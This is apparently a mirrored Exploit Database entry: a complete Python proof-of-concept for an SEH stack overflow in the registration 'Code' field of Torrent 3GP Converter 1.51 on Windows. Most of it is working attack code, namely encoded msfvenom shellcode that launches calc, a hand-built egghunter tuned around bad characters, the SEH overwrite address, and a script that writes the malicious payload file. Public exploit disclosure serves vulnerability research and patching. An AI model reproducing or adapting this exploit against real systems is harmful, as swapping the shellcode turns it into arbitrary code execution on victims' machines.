Torrent 3GP Converter 1.51 – Stack Overflow (SEH)

• Exploit Database
• 129 阅读

• 作者： boku
  日期： 2020-01-27
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47965/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133

  # Exploit Title: Torrent 3GP Converter 1.51 - Stack Overflow (SEH) # Exploit Author: boku # Date: 2020-01-24 # Software Vendor: torrentrockyou # Vendor Homepage: http://www.torrentrockyou.com # Software Link: http://www.torrentrockyou.com/download/tr3gpconverter.exe # Version: Torrent 3GP Converter Version 1.51 Build 116 # Tested On: Windows 10 Home (x86) 10.0.18363 Build 18363 # Tested On: Windows 10 Education (x86) 10.0.18363 Build 18363 # Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363 # Recreate: #1) Download, install, and open Torrent 3GP Converter 1.51 Build 116 for windows x86 #2) run python script & open created 'crash.txt' file #3) select-all > copy-all #4) in app, click 'Register' on the bottom #5) in 'Name:' textbox enter 'a' #6) in 'Code:' textbox paste buffer #7) click 'OK', calculator will open & app will crash   #!/usr/bin/python   # Bad Chars # \x00 => \x20 # \x0d Truncates buffer # \x2d Gets ejected from buffer # \x61-\x6f => \x41-\x4f / ASCII Lower => ASCII Upper # \x70-\x7a => \x50-\x5a / ASCII Lower => ASCII Upper # \x9a => \x8a # \x9c => \x8c # \x9e => \x8e # \xe0-\xef => \xc0-\xcf # \xf0-\xf6 => \xd0-\xd6 # \xf8-\xfe => \xd8-\xde # \xff => \x9f # badChars='\x00\x0d\x2d\x61\x62\x63\64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x9a\x9c\x9e\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xee\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' # Max shellcode size is 2384bytes # - First 2384 bytes of our buffer is left unmangled on the stack # msfvenom -p windows/exec CMD='calc' -e x86/alpha_upper --format python -v shellcode # x86/alpha_upper chosen with final size 447 # Payload size: 447 bytes ## msfvenom x86/alpha_uppers GetPC Routine ## #[!] Does not work because of the bad chars! # Manually replaced with a working version of GetPC for this exploit # 89E5mov ebp, esp shellcode = b'\x54\x5D' # push esp # pop ebp # DBCDfcmovne st, st(5) shellcode += b'\x89\xCF' # mov edi, ecx # D975 F4 fstenv [ebp-C] shellcode += b'\x47\x47\x90' # inc edi # inc edi # nop # 5Fpop edi shellcode += b'\x90' # nop shellcode += b"\x57\x59\x49" shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a" shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30" shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41" shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42" shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" shellcode += b"\x49\x4b\x4c\x5a\x48\x4d\x52\x55\x50\x55\x50" shellcode += b"\x33\x30\x43\x50\x4b\x39\x4b\x55\x46\x51\x59" shellcode += b"\x50\x42\x44\x4c\x4b\x30\x50\x36\x50\x4c\x4b" shellcode += b"\x56\x32\x34\x4c\x4c\x4b\x56\x32\x42\x34\x4c" shellcode += b"\x4b\x34\x32\x31\x38\x34\x4f\x4e\x57\x50\x4a" shellcode += b"\x37\x56\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x35" shellcode += b"\x31\x43\x4c\x34\x42\x56\x4c\x47\x50\x39\x51" shellcode += b"\x58\x4f\x34\x4d\x45\x51\x59\x57\x4a\x42\x4a" shellcode += b"\x52\x46\x32\x56\x37\x4c\x4b\x31\x42\x44\x50" shellcode += b"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x50\x4c\x42" shellcode += b"\x31\x33\x48\x4b\x53\x51\x58\x45\x51\x4e\x31" shellcode += b"\x30\x51\x4c\x4b\x31\x49\x51\x30\x55\x51\x59" shellcode += b"\x43\x4c\x4b\x30\x49\x42\x38\x4b\x53\x37\x4a" shellcode += b"\x57\x39\x4c\x4b\x47\x44\x4c\x4b\x53\x31\x59" shellcode += b"\x46\x46\x51\x4b\x4f\x4e\x4c\x39\x51\x38\x4f" shellcode += b"\x34\x4d\x35\x51\x4f\x37\x57\x48\x4d\x30\x53" shellcode += b"\x45\x4c\x36\x45\x53\x53\x4d\x4a\x58\x37\x4b" shellcode += b"\x43\x4d\x46\x44\x33\x45\x4a\x44\x56\x38\x4c" shellcode += b"\x4b\x36\x38\x47\x54\x45\x51\x38\x53\x32\x46" shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x50\x58\x45" shellcode += b"\x4c\x53\x31\x59\x43\x4c\x4b\x45\x54\x4c\x4b" shellcode += b"\x33\x31\x38\x50\x4d\x59\x57\x34\x57\x54\x36" shellcode += b"\x44\x31\x4b\x51\x4b\x33\x51\x36\x39\x31\x4a" shellcode += b"\x50\x51\x4b\x4f\x4d\x30\x51\x4f\x31\x4f\x50" shellcode += b"\x5a\x4c\x4b\x45\x42\x5a\x4b\x4c\x4d\x51\x4d" shellcode += b"\x52\x4a\x35\x51\x4c\x4d\x4c\x45\x48\x32\x35" shellcode += b"\x50\x43\x30\x33\x30\x46\x30\x43\x58\x46\x51" shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f" shellcode += b"\x4b\x5a\x50\x38\x35\x39\x32\x31\x46\x53\x58" shellcode += b"\x4e\x46\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x58" shellcode += b"\x55\x47\x4c\x35\x56\x43\x4c\x35\x5a\x4b\x30" shellcode += b"\x4b\x4b\x4d\x30\x42\x55\x44\x45\x4f\x4b\x37" shellcode += b"\x37\x45\x43\x54\x32\x32\x4f\x42\x4a\x55\x50" shellcode += b"\x36\x33\x4b\x4f\x58\x55\x45\x33\x55\x31\x32" shellcode += b"\x4c\x43\x53\x35\x50\x41\x41" # Stack EggHunter for fun & profit egg = 'BOKU' hunterOS = '\x41'*(2784-len(egg+egg+shellcode)) # After executing the code in nSEH, we are left with 88 bytes to create our Hunter hunter= '\x4C'*4 # dec esp * 4 / avoid sub bad char / topOfStack=GetPC hunter+= '\x5B' # pop ebx / EBX=PC hunter+= '\x80\x43\x29\x20' # add byte [ebx+41], 0x20 / 20+55=7F=jnz hunter+= '\x80\x43\x33\x20' # add byte [ebx+51], 0x20 / 20+55=7F=jnz hunter+= '\xB8\x42\x4F\x4B\x55' # mov eax,0x424f4b55 hunter+= '\x54' # push esp hunter+= '\x59' # pop ecx hunter+= '\x90'*18 # nop fillers for jnz short -7 loop hunter+= '\x49' # dec ecx hunter+= '\x3B\x01' # cmp eax, [ecx] hunter+= '\x55\xF7' # 75F7 = jnz short -7 / Have to avoid bad \xF- chars hunter+= '\x51' # push ecx hunter+= '\x5a' # pop edx hunter+= '\x4a'*4 # dec edx * 4 / check if second egg matchs hunter+= '\x3B\x02' # cmp eax, [edx] hunter+= '\x55\xDF' # jnz short -31 / back to the loop - avoid bad chars hunter+= '\x83\xc1\04' # add ecx, 0x4 / start of shellcode after eggs hunter+= '\x31\xd2' # xor edx,edx hunter+= '\x52' # push edx hunter+= '\xC6\x44\x24\x02\x4B' # mov byte [esp+0x2],0x4b hunter+= '\xC6\x44\x24\x01\x44' # mov byte [esp+0x1],0x44 hunter+= '\xC6\x04\x24\x39' # mov byte [esp],0x39 # [ESP]=0x004b4439 : call ecx | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe] # ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:\Program Files\Torrent 3GP Converter\bsvideoconverter.exe) hunter+= '\xc3' # ret huntRmdr = '\x41'*(88-len(hunter)) nsehOS = '\x90'*(4500-len(egg+egg+shellcode+hunterOS+hunter+huntRmdr)) nSEH = '\x83\xC4\x04\xC3' # add esp,byte +0x4 # ret # 3-byte SEH overwrite using the truncating Null byte SEH= '\x0f\x47\x4c' # 0x004c470f : pop esi # pop ebx # ret [bsvideoconverter.exe] # ASLR: False, Rebase: False, SafeSEH: False {PAGE_EXECUTE_READWRITE}   payload= egg+egg+shellcode+hunterOS+hunter+huntRmdr+nsehOS+nSEH+SEH   try: f=open("crash.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")